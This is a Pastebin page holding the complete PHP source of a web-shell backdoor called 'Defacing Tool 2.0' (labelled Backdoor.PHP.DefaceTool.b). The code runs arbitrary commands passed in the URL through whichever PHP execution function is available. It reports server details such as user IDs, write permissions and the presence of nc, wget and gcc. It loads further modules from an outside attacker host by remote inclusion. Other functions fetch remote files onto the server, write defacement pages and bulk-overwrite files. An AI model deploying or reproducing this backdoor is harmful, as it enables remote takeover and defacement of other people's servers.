API tools faq
paste
Advertisement
FlyFar

Backdoor.PHP.DefaceTool.b - Source Code

FlyFar
Jun 13th, 2023
695
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 15.00 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <!--
  2. Defacing Tool 2.0 by r3v3ng4ns
  3. revengans@gmail.com
  4. se for modificar o codigo, por favor, mantenha o nome de seus autores originais
  5. e por favor, mantenha a cmd priv8. se vc recebeu o codigo ou url, confiei(amos) em vc...
  6. -->
  7. <?php
  8. @closelog();
  9. @error_reporting(0);
  10. $vers="2.0beta priv8!";
  11. $remote_addr="http://dezu.webshells.org/";
  12. $format_addr=".dat";
  13. $cmd_addr=$remote_addr."tool20".$format_addr;
  14. $safe_addr=$remote_addr."safe20".$format_addr;
  15. $writer_addr=$remote_addr."writer20".$format_addr;
  16. $phpget_addr=$remote_addr."get20".$format_addr;
  17. $feditor_addr=$remote_addr."filed".$format_addr;
  18. $put_addr=$remote_addr."filed_put".$format_addr;
  19. $total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
  20.  
  21. if(empty($chdir)) $chdir = @$_GET['chdir'];
  22. if(empty($cmd)) $cmd = @$_GET['cmd'];
  23. if(empty($fu)) $fu = @$_GET['fu'];
  24. if(empty($list)) $list = @$_GET['list'];
  25.  
  26. if(empty($chdir) or $chdir=='') $chdir=getcwd();
  27. $cmd = stripslashes(trim($cmd));
  28.  
  29.  
  30. //CHDIR tool
  31. if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
  32.     $boom = explode(" ",$cmd,2);
  33.     $boom2 = explode(";",$boom['1'], 2);
  34.     $toDir = $boom2['0'];
  35.  
  36.     if($boom['1']=="/")$chdir="";
  37.     else if(strpos($cmd, 'chdir ..')!==false){
  38.         $cadaDir = array_reverse(explode("/",$chdir));
  39.         if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
  40.         else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
  41.         $toDir = str_replace($lastDir,"",$chdir);
  42.         if($toDir=="/")$chdir="";
  43.     }
  44.     else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
  45.     else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
  46.  
  47.     if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
  48.     if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
  49.     else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
  50.     else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
  51.     if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
  52.     if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
  53. }
  54. if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
  55. $cmdShow = $cmd;
  56.  
  57. //To keep the changes in the url, when using the 'GET' way to send php variables
  58. if(empty($post)){
  59.     if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
  60.     if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
  61.     if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
  62. }
  63.  
  64. //INFO table (pro and normal)
  65. if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
  66. if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
  67. if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
  68. if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
  69. if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
  70. if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
  71. $safe = @ini_get($safemode);
  72. if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
  73. $pro8 = "<i>PHP </i>".phpversion();
  74. $pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
  75. $login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
  76. $ip=@gethostbyname($_SERVER['HTTP_HOST']);
  77.  
  78. //Turns the 'ls' command more usefull, showing it as it looks in the shell
  79. if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
  80. else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
  81. else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
  82. else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
  83. else if($cmd=='ls') $cmd = "ls -F";
  84.  
  85. //If there are some '//' in the cmd, its now removed
  86. if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
  87. ?>
  88. <body onload="focar();">
  89. <style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
  90. .infop{font-family: verdana; font-size: 10px; color:#000000;}
  91. .infod{font-family: verdana; font-size: 10px; color:#414978;}
  92. .algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
  93. .titulod{font:Verdana; color:#414978; font-size:20px;}</style>
  94. <script>
  95. function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
  96. function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
  97. function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
  98. function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
  99. function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
  100. function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
  101. function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
  102. function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
  103. function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
  104. function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
  105. </script>
  106. <table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
  107. <tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
  108. <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
  109. </b></div></td></tr>
  110. <tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
  111. <?php
  112.  $uname = @posix_uname();
  113.  while (list($info, $value) = each ($uname)) { ?>
  114. <TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
  115. <TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
  116. <TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
  117. <TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
  118. <TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
  119. <? if($chdir!=getcwd()){?>
  120. <TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
  121. <TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
  122. </DIV></TD></TR></TABLE></td></tr>
  123. <tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
  124. <table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
  125. <td width="75"><DIV class="algod">command</DIV></td>
  126. <td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
  127. <script>
  128. function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
  129. </script>
  130. </td></tr></table><table><tr><td>
  131. <?php
  132. ob_start();
  133. if(isset($chdir)) @chdir($chdir);
  134. function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
  135. function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
  136. function shell($what){echo(shell_exec($what));}
  137. function popenn($what){
  138.     $handle=popen("$what", "r");
  139.     $out=@fread($handle, 2096);
  140.     echo $out;
  141.     @pclose($handle);
  142. }
  143. function execc($what){
  144.     exec("$what",$array_out);
  145.     $out=implode("\n",$array_out);
  146.     echo $out;
  147. }
  148. function procc($what){
  149.     //na sequencia: stdin, stdout, sterr
  150.     if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
  151.     $process = @proc_open("$what",$descpec,$pipes);
  152.     if (is_resource($process)) {
  153.         fwrite($pipes[0], "");
  154.         fclose($pipes[0]);
  155.  
  156.         while(!feof($pipes[2])) {
  157.             $erro_retorno = fgets($pipes[2], 4096);
  158.             if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
  159.         }
  160.             fclose($pipes[2]);
  161.  
  162.         while(!feof($pipes[1])) {
  163.             echo fgets($pipes[1], 4096);
  164.         }
  165.         fclose($pipes[1]);
  166.  
  167.         $ok_p_fecha = @proc_close($process);
  168.     }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
  169. }else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
  170. }
  171.  
  172. $funE="function_exists";
  173. if($safe){$fe="safemode";$feshow=$fe;}
  174. elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
  175. elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
  176. elseif($funE('system')){$fe="system";$feshow=$fe;}
  177. elseif($funE('exec')){$fe="execc";$feshow="exec";}
  178. elseif($funE('popen')){$fe="popenn";$feshow="popen";}
  179. elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
  180. else {$fe="nofunction";$feshow=$fe;}
  181. if($fu!="0" or !empty($fu)){
  182.   if($fu==1){$fe="passthru";$feshow=$fe;}
  183.   if($fu==2){$fe="system";$feshow=$fe;}
  184.   if($fu==3){$fe="execc";$feshow="exec";}
  185.   if($fu==4){$fe="popenn";$feshow="popen";}
  186.   if($fu==5){$fe="shell";$feshow="shell_exec";}
  187.   if($fu==6){$fe="procc";$feshow="proc_open";}
  188. }
  189. $fe("$cmd 2>&1");
  190. $output=ob_get_contents();ob_end_clean();
  191. ?>
  192. <td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
  193. <option><?="using $feshow()";?>
  194. <option value="1">use passthru()
  195. <option value="2">use system()
  196. <option value="3">use exec()
  197. <option value="4">use popen()
  198. <option value="5">use shell_exec()
  199. <option value="6">use proc_open()*new
  200. <option value="0">auto detect (default)
  201. </select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
  202. <? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
  203. </tr></table></td></tr></table></form></td></tr>
  204. <tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
  205. <TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
  206. <?php
  207. echo $ch_msg;
  208. if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
  209. if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
  210. ?></TEXTAREA><BR></td></tr>
  211. <?php
  212. if($list=="1") @include($remote_addr."flist".$format_addr);
  213. ?>
  214. </table
Tags: php tool Deface
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!